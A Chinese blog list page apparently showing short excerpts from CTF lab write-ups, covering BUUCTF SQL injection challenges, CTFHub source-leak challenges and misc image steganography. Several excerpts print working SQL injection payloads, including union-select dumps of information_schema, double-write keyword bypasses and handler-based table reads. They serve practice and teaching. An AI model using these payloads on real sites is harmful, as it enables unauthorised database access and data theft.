自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(16)
  • 收藏
  • 关注

原创 buuctf刷题 [强网杯 2019]随便注

由于过滤了select,使用handler 命令查看表中的数据,需要注意的是,表名如果是数字,则需要使用反引号包裹起来。打开靶场发现是一个sql注入题,尝试注入1'、1、1"等判断这个题是单引号字符型注入。handler `表名` read first;handler `表名` read next;handler `表名` close;handler `表名` open;输入万能密码:1' or 1=1#

2024-11-30 07:55:56 155

原创 buuctf刷题 [极客大挑战 2019]LoveSQL

爆字段:0' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema = database() and table_name='l0ve1ysq1'#爆表:0' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()#

2024-11-29 21:28:31 357

原创 buuctf刷题 [极客大挑战 2019]EasySQL

这是一个sql注入题,打开靶场发现要我们输入用户名和密码,只输用户名或密码会报错。用户名和密码都输入\,通过报错查看这道题是单引号闭合。

2024-11-29 15:41:00 197

原创 buuctf刷题 [极客大挑战 2019]BabySQL

爆表:1' ununionion seselectlect 1,2,group_concat(table_name) frfromom infoorrmation_schema.tables whwhereere table_schema='geek'#绕过了union select,尝试双写绕过:1' ununionion seselectlect 1,2,3#爆库:1' ununionion seselectlect 1,2,database()#输入:0' union select 1,2,3#

2024-11-29 11:34:28 329

原创 buuctf刷题 [SUCTF 2019]EasySQL

那么sql语句就变成了 select *, 1 || flag from Flag,1||flag是个短路算法,直接输出1了,select * from Flag 通过查看表Flag中的所有数据可以 get到flag。根据前面的回显:输入1到9返回Array ( [0] => 1(此处的1可能代表Ture)),输入0或字符没有回显,仅有的两种回显,可以判断出,后端应该使用的是逻辑或,即条件为真进行回显或条件不满足返回空白。情况二:若command1为0或字母,command2为非0数字,则结果为1。

2024-11-28 21:52:02 275

原创 CTFHub信息泄露 HG泄露篇

搜索flag,发现可疑文件flag_28812171.txt,使用curl查看网站的flag_28812171.txt得到flag。使用tree目录查看.hg目录结构,查看可疑文件,在last-message.txt中发现历史版本add flag。使用dvcs-ripper下载靶场泄露文件到本地,提示404报错,应该是没有完整下载网站目录。使用dirsearch扫描靶场,发现存在.HG目录,说明是HG泄露。-r:递归地搜索指定目录及其子目录中所有文件。-a:将二进制文件视为文本文件来处理。

2024-11-27 06:15:00 451

原创 CTFHub信息泄露 svn泄露篇

svn1.6及以前版本会在项目的每个文件夹下都生成一个.svn文件夹,里面包含了所有文件的备份,文件名为 .svn/text-base/文件名.svn-base。svn1.7及以后版本则只在项目根目录生成一个.svn文件夹,里面的pristine文件夹里包含了整个项目的所有文件备份。分别查看4e和bf目录下的两个文件,在4e目录下的文件中发现flag。使用dirb扫描靶场,发现存在svn的目录,说明是svn泄露泄露。进入.svn目录中查看目录下的所有文件。

2024-11-26 11:41:31 604

原创 CTFHub信息泄露 git泄露篇

进入到/root/GitHack-master/dist/challenge-e713a8245931ce60.sandbox.ctfhub.com_10800文件下,使用命令ls -a发现.git,使用git log查看git历史记录,发现当前所处的版本为 remove flag,flag 在 add flag 这次提交中。使用git log查看git历史记录,发现当前所处的版本为 remove flag,flag 在 add flag 这次提交中,使用git diff查看日志对比,并没有得到flag。

2024-11-26 11:23:12 1848

原创 CTFHub 信息泄露 phpinfo篇

ctrl+F搜索ctfhub找到flag。点击查看phpinfo。

2024-11-26 10:52:01 223

原创 CTFHub信息泄露 备份文件下载篇

经过尝试发现在访问.index.php.swp时有下载文件(.index.php.swp文件中,最前面的 . 表示这是一个隐藏文件),打开得到flag。中的flag_1949920613.txt,发现flag不在这里,直接在网页中访问flag_1949920613.txt得到flag。提示flag在index.php源码中,由于是vim缓存泄露,所以在要在后面添加.swp或者.swo。访问index.php.bak后自动下载了一个index.php.bak文件,打开得到flag。

2024-11-26 07:00:00 518

原创 CTFHub信息泄露 目录遍历篇

因为知道是目录遍历,可以直接挨着一个一个点开看,最终在/flag_in_here/4/3/目录下发现flag.txt(好像是动态的,每次开启都不一样),点开后得到flag。点击开始寻找flag。

2024-11-25 20:11:13 139

原创 流量分析刷题记录(一)writeup

打开流量包后直接搜索flag,能搜到一个flag{0a19b0453da898f5a8f4a7b3dfb53d74}但这个flag是假的,在搜索flag的过程中会发现很多flag.rar压缩包,推测flag应该是藏在压缩包中,搜索Rar,搜索时选择区分大小写,可以直接找到压缩包内容。在一处流量的分组详情中发现z2的值好像是一张图片,将其导出为key.txt,然后用010editor导入16进制,删除前面多余的东西,另存为图片,得到压缩包密码:Th1s_1s_p4sswd_!,最后解压得到flag。

2024-11-25 18:34:22 3310

原创 ctfshow web入门 信息搜集

访问/admin/是一个后台登入地址,尝试弱密码无果后发现可以选择忘记密码,需要填写所在城市,通过上面获得的QQ号进行搜索,信息上显示了属地是西安,提交后获得新密码:admin7789。访问/editor/目录,点击插入文件,选择文件空间,可以看到整个目录结构,在/var/www/html/nothinghere/fl000g.txt处发现flag文件。打开靶场使用dirsearch工具对靶场进行目录扫描,发现可以访问/admin/目录,并在网页的结尾发现泄露的QQ邮箱。

2024-11-24 20:48:06 1576 1

原创 CTFshow misc入门 图片篇(颜色通道)

使用stegsolve打开图片,查看颜色通道时发现在red plane 4、red plane 2、red plane 1、green plane 4、green plane 2、green plane 1处发现左上方有东西,应该是lsb隐写痕迹。可以使用windows自带的画图软件,将图片垂直翻转后使用使用stegsolve打开图片,使用Analyse中的data extract,选上对应选项,点击preview预览,发现是个压缩包,点击save bin提取出来。

2024-11-08 17:53:04 805

原创 CTFshow misc入门 图片篇(信息附加)

逐个删除IDAT,然后按F7预览图片,删到第八个时得到flag。重新使用binwalk分析图片,发现有个压缩包,使用binwalk分离出来,解压后D6E文件,使用010editor查看发现是张png图片,修改后缀名查看得到flag。题目提示了:flag在序号里,使用exiftool查看图片属性,看到flag的标志,但是内容是空的,在序号那看到一串数字但不是flag。题目提示了:flag在评论里,查看图片属性找不到flag,可以在kali中使用exiftool查看,发现有段提示,是flag的谐音。

2024-11-06 15:00:00 893

原创 CTFshow misc入门 图片篇(图片结构)

使用ApngDisassembler打开apng图片,inupt处选择apng文件,output处是输出文件的前缀,点击convert转换,会逐帧分离apng图片,并生成一个txt问问文件,里面是每张图片的delay。gif图片从文件头开始数第七和第八个字节是宽,第九第十个字节是高,将高的值修改为250即FA,gif有多个地方要修改高度,可以直接搜索变量名称:height,发现一共有两个地方,修改保存后打开图片看到flag。使用脚本通过正确的crc爆破png图片宽高,运行结果为:1044 150;

2024-11-06 15:00:00 799 1

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除